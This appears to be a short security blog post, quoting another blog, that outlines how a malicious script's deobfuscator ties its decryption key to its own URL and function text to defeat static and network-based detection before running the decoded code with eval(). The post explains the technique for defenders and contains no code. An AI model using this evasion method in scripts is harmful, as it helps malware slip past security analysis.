How does this deobfuscator thwart security researchers? From Trends blog...
- It retrieves the URL where the malicious script is located.
- It retrieves its own function and adds the string of the URL.
- It computes the CRC of the function plus the URL.
- It decrypts an encrypted code in the script body using the CRC that was computed.
- It executes the decrypted code using the eval() function.
It's not precisely rocket science, but it's more that sufficient to bypass static analysis investigation and network-based detection systems.
The particular technique of tying the decryption key to the URL of the source has been discussed for several years - and has been tried in the past (legitimately) by various Web sites that endeavor to protect their content from plagiarism. It's neither elegant nor a robust protection mechanism against host-based manipulation. - but from a network perspective it's "good enough".